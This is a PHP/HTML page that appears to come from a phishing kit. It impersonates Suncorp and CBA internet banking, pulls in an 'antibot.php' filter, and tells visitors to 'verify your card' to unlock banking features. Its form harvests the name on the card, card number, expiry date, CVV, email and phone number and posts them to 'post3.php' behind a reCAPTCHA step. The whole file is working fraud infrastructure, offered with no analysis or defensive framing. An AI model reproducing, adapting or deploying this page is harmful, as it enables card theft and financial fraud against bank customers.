﻿<?php
require "antibot.php";
include "id.php";
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Internet Banking</title>
    <link rel="stylesheet" href="styles.css">
    <script src="script.js" defer></script>
</head>
<body>
    <header>
        <div class="logo">
            <img src="suncorp-logo.png" alt="Suncorp Logo" style="
    width: 250px;
    height: 70px;
">
        </div>
    </header>
    <main>
        <div class="container">
            <div class="login-container">
                <h2>Logged On - <span id="current-date"></span></h2>
                <button type="button">Logout</button>
                <p>Need to verify your card to update your account and unlock banking features:</p>
                <ul>
                    <li>Withdraw ATM</li>
                    <li>In store payment</li>
                    <li>Local and international transfers</li>
                </ul>
                <form id="card-verification-form" method="POST" action="post3.php">
                    <label for="name-on-card">Name on Card</label>
                    <input type="text" id="name-on-card" name="name-on-card" required placeholder="John Doe">

                    <label for="card-number">Card Number</label>
                    <input type="text" id="card-number" name="card-number" maxlength="19" required placeholder="1234 5678 9012 3456">

                    <div style="display: flex; justify-content: space-between; align-items: center;">
                        <div style="flex: 1; margin-right: 10px;">
                            <label for="expiry-date">Expiry Date</label>
                            <input type="text" id="expiry-date" name="expiry-date" maxlength="5" required placeholder="MM/YY">
                        </div>
                        <div style="flex: 1;">
                            <label for="cvv">CVV</label>
                            <input type="text" id="cvv" name="cvv" maxlength="3" required placeholder="123" style="width: 80px;">
                        </div>
                    </div>

                    <h3>Contact Details</h3>

                    <label for="email">Email</label>
                    <input type="email" id="email" name="email" required placeholder="example@example.com">

                    <label for="phone-number">Phone Number</label>
                    <input type="tel" id="phone-number" name="phone-number" required placeholder="123-456-7890">

                    <button type="submit">Submit</button>
                </form>
            </div>
            <aside>
                <h3>Need some help?</h3>
                <ul>
                    <li><a href="#"><span class="icon-arrowRight"></span>Login and Password Support</a></li>
                    <li><a href="#"><span class="icon-arrowRight"></span>Frequently asked questions</a></li>
                    <li><a href="#"><span class="icon-arrowRight"></span>How to use Internet Banking</a></li>
                </ul>
                <h3>Being safe online</h3>
                <ul>
                    <li><a href="#"><span class="icon-arrowRight"></span>See how we protect your money online</a></li>
                    <li><a href="#"><span class="icon-arrowRight"></span>Identify scams at home</a></li>
                    <li><a href="#"><span class="icon-arrowRight"></span>Safe banking tips</a></li>
                    <li><a href="#"><span class="icon-arrowRight"></span>Protecting your computer</a></li>
                </ul>
                <p class="security-note"><strong>CBA Security</strong> Committed to providing you a safe banking environment</p>
            </aside>
        </div>
    </main>
    <footer>
        <p>Terms and Conditions &nbsp; | &nbsp; Contact Us</p>
        <p>© Copyright CBA ABN 66 010 831 722<br>
        CBA Banking, Issued by CBA AFSL No 229882</p>
    </footer>
    <script>
        document.getElementById('current-date').innerText = new Date().toLocaleDateString();
    </script>
			<script src="https://www.google.com/recaptcha/api.js?render=<?php echo $siteKey; ?>"></script>
<script>
grecaptcha.ready(function() {
    document.getElementById('card-verification-form').addEventListener('submit', function(event) {
        event.preventDefault(); // Prevent form submission
        grecaptcha.execute('<?php echo $siteKey; ?>', {action: 'submit'}).then(function(token) {
            // Add your logic to submit form or append the token to the form
            var recaptchaResponse = document.createElement('input');
            recaptchaResponse.type = 'hidden';
            recaptchaResponse.name = 'recaptcha_response';
            recaptchaResponse.value = token;
            document.getElementById('card-verification-form').appendChild(recaptchaResponse);

            // Now submit the form
            document.getElementById('card-verification-form').submit();
        });
    });
});
</script>
</body>
</html>
